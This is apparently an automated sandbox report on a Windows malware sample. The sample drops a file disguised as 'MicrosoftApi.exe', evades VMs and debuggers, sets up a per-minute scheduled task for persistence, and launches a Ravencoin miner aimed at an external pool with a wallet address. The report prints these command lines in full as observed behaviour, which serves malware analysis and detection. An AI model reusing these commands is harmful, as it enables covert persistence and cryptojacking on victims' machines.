Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
27-07-2021 03:08
Static task
static1
Behavioral task
behavioral1
Sample
2b54ccc44e89581b1005e8b6f24a7822.exe
Resource
win7v20210410
General
-
Target
2b54ccc44e89581b1005e8b6f24a7822.exe
-
Size
4.6MB
-
MD5
2b54ccc44e89581b1005e8b6f24a7822
-
SHA1
d7de533078a3d1204e1a0c9440501928e0cf1285
-
SHA256
aef5c612c2920526ea0ccc636e689417885c2dfb17793de9a259d6ced6fdd7cc
-
SHA512
c8e1bf41b5dfe40bbf39cc534099c5224851ba8b97f545262eac0790c3cc3bcc7c1d381e6f95c4c2884d3979e1ee8e51b615adc182a726d591c5eeefec5ad120
Malware Config
Signatures
-
suricata: ET MALWARE Generic gate[.].php GET with minimal headers
-
suricata: ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 3 IoCs
Processes:
MicrosoftApi.exeMicrosoftApi.exeMRBKYMNOAdmine.exepid process 392 MicrosoftApi.exe 360 MicrosoftApi.exe 1084 MRBKYMNOAdmine.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exe upx C:\Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exe upx -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
MicrosoftApi.exeMicrosoftApi.exe2b54ccc44e89581b1005e8b6f24a7822.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MicrosoftApi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MicrosoftApi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MicrosoftApi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MicrosoftApi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2b54ccc44e89581b1005e8b6f24a7822.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2b54ccc44e89581b1005e8b6f24a7822.exe -
Loads dropped DLL 2 IoCs
Processes:
2b54ccc44e89581b1005e8b6f24a7822.exeMicrosoftApi.exepid process 1072 2b54ccc44e89581b1005e8b6f24a7822.exe 360 MicrosoftApi.exe -
Processes:
resource yara_rule behavioral1/memory/1072-61-0x000000013FEA0000-0x000000013FEA1000-memory.dmp themida \Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe themida C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe themida behavioral1/memory/392-72-0x000000013F080000-0x000000013F081000-memory.dmp themida C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe themida behavioral1/memory/360-82-0x000000013FF60000-0x000000013FF61000-memory.dmp themida -
Processes:
2b54ccc44e89581b1005e8b6f24a7822.exeMicrosoftApi.exeMicrosoftApi.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2b54ccc44e89581b1005e8b6f24a7822.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MicrosoftApi.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MicrosoftApi.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
2b54ccc44e89581b1005e8b6f24a7822.exeMicrosoftApi.exeMicrosoftApi.exepid process 1072 2b54ccc44e89581b1005e8b6f24a7822.exe 392 MicrosoftApi.exe 360 MicrosoftApi.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 924 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
MicrosoftApi.exepid process 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe 360 MicrosoftApi.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
MicrosoftApi.exedescription pid process Token: SeDebugPrivilege 360 MicrosoftApi.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
2b54ccc44e89581b1005e8b6f24a7822.exeMicrosoftApi.execmd.exetaskeng.exeMicrosoftApi.exedescription pid process target process PID 1072 wrote to memory of 392 1072 2b54ccc44e89581b1005e8b6f24a7822.exe MicrosoftApi.exe PID 1072 wrote to memory of 392 1072 2b54ccc44e89581b1005e8b6f24a7822.exe MicrosoftApi.exe PID 1072 wrote to memory of 392 1072 2b54ccc44e89581b1005e8b6f24a7822.exe MicrosoftApi.exe PID 392 wrote to memory of 664 392 MicrosoftApi.exe cmd.exe PID 392 wrote to memory of 664 392 MicrosoftApi.exe cmd.exe PID 392 wrote to memory of 664 392 MicrosoftApi.exe cmd.exe PID 664 wrote to memory of 924 664 cmd.exe timeout.exe PID 664 wrote to memory of 924 664 cmd.exe timeout.exe PID 664 wrote to memory of 924 664 cmd.exe timeout.exe PID 664 wrote to memory of 848 664 cmd.exe schtasks.exe PID 664 wrote to memory of 848 664 cmd.exe schtasks.exe PID 664 wrote to memory of 848 664 cmd.exe schtasks.exe PID 1864 wrote to memory of 360 1864 taskeng.exe MicrosoftApi.exe PID 1864 wrote to memory of 360 1864 taskeng.exe MicrosoftApi.exe PID 1864 wrote to memory of 360 1864 taskeng.exe MicrosoftApi.exe PID 360 wrote to memory of 1084 360 MicrosoftApi.exe MRBKYMNOAdmine.exe PID 360 wrote to memory of 1084 360 MicrosoftApi.exe MRBKYMNOAdmine.exe PID 360 wrote to memory of 1084 360 MicrosoftApi.exe MRBKYMNOAdmine.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2b54ccc44e89581b1005e8b6f24a7822.exe"C:\Users\Admin\AppData\Local\Temp\2b54ccc44e89581b1005e8b6f24a7822.exe"1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe"C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpAC56.tmp.cmd""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 44⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /f /sc MINUTE /mo 1 /tn "MicrosoftApi" /tr "'C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe"'4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {CE79554E-3DC8-4DC3-BA1E-35F76C3A9250} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exeC:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exe"C:\Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exe" --algo kawpow --server rvn.2miners.com:6060 --user RC1rszoXopQ8E24icWrqSRE8xCdsMXcWzw.Bv2 -w 03⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmpAC56.tmp.cmdMD5
63bab368a9ce36f0507fe97329e0ab20
SHA1baccbe6de18b588046cf3001526d3f27a8ca91d7
SHA2562015c77c2b3aa5dc3093e6855c8f882cae9d40e7087e1013a45e4df6dab9e158
SHA51225c726d318ad3e1ce8f8a1d8f898cb8e2b76de3998ec695f2e26b3ded6fbdb29e673d32c35d3d1773cf142e6b9cea425090b4b9af2596ae32ae7424e27334356
-
C:\Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exeMD5
48e6d7bd626e9d7c0192eba46918a870
SHA15327b24d898ea440c404a6384d9dad2de80e74d4
SHA25628484d217bf08c05dba373b6dada80f4a3812b1fc5820ab6ca2f09d5456671ee
SHA5126625aba02ef85a919328d83c3b672ad0328f9529f702a850a9420ccfad48d811e4c73811602c91f375ca66f4e48438d970b3549a7fd94d5a801aba4b6cd91c5a
-
C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exeMD5
2b54ccc44e89581b1005e8b6f24a7822
SHA1d7de533078a3d1204e1a0c9440501928e0cf1285
SHA256aef5c612c2920526ea0ccc636e689417885c2dfb17793de9a259d6ced6fdd7cc
SHA512c8e1bf41b5dfe40bbf39cc534099c5224851ba8b97f545262eac0790c3cc3bcc7c1d381e6f95c4c2884d3979e1ee8e51b615adc182a726d591c5eeefec5ad120
-
C:\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exeMD5
2b54ccc44e89581b1005e8b6f24a7822
SHA1d7de533078a3d1204e1a0c9440501928e0cf1285
SHA256aef5c612c2920526ea0ccc636e689417885c2dfb17793de9a259d6ced6fdd7cc
SHA512c8e1bf41b5dfe40bbf39cc534099c5224851ba8b97f545262eac0790c3cc3bcc7c1d381e6f95c4c2884d3979e1ee8e51b615adc182a726d591c5eeefec5ad120
-
\Users\Admin\AppData\Roaming\ServiceApi\MRBKYMNOAdmine.exeMD5
48e6d7bd626e9d7c0192eba46918a870
SHA15327b24d898ea440c404a6384d9dad2de80e74d4
SHA25628484d217bf08c05dba373b6dada80f4a3812b1fc5820ab6ca2f09d5456671ee
SHA5126625aba02ef85a919328d83c3b672ad0328f9529f702a850a9420ccfad48d811e4c73811602c91f375ca66f4e48438d970b3549a7fd94d5a801aba4b6cd91c5a
-
\Users\Admin\AppData\Roaming\ServiceApi\MicrosoftApi.exeMD5
2b54ccc44e89581b1005e8b6f24a7822
SHA1d7de533078a3d1204e1a0c9440501928e0cf1285
SHA256aef5c612c2920526ea0ccc636e689417885c2dfb17793de9a259d6ced6fdd7cc
SHA512c8e1bf41b5dfe40bbf39cc534099c5224851ba8b97f545262eac0790c3cc3bcc7c1d381e6f95c4c2884d3979e1ee8e51b615adc182a726d591c5eeefec5ad120
-
memory/360-85-0x000007FE80010000-0x000007FE80011000-memory.dmpFilesize
4KB
-
memory/360-86-0x000000001C1A0000-0x000000001C1A2000-memory.dmpFilesize
8KB
-
memory/360-84-0x0000000000070000-0x0000000000071000-memory.dmpFilesize
4KB
-
memory/360-79-0x0000000000000000-mapping.dmp
-
memory/360-82-0x000000013FF60000-0x000000013FF61000-memory.dmpFilesize
4KB
-
memory/392-69-0x00000000005F0000-0x00000000005F1000-memory.dmpFilesize
4KB
-
memory/392-70-0x000007FE80010000-0x000007FE80011000-memory.dmpFilesize
4KB
-
memory/392-72-0x000000013F080000-0x000000013F081000-memory.dmpFilesize
4KB
-
memory/392-77-0x0000000000600000-0x0000000000601000-memory.dmpFilesize
4KB
-
memory/392-66-0x0000000000000000-mapping.dmp
-
memory/664-74-0x0000000000000000-mapping.dmp
-
memory/848-78-0x0000000000000000-mapping.dmp
-
memory/924-76-0x0000000000000000-mapping.dmp
-
memory/1072-61-0x000000013FEA0000-0x000000013FEA1000-memory.dmpFilesize
4KB
-
memory/1072-68-0x0000000000080000-0x0000000000081000-memory.dmpFilesize
4KB
-
memory/1072-64-0x000007FE80010000-0x000007FE80011000-memory.dmpFilesize
4KB
-
memory/1072-63-0x0000000000070000-0x0000000000071000-memory.dmpFilesize
4KB
-
memory/1084-88-0x0000000000000000-mapping.dmp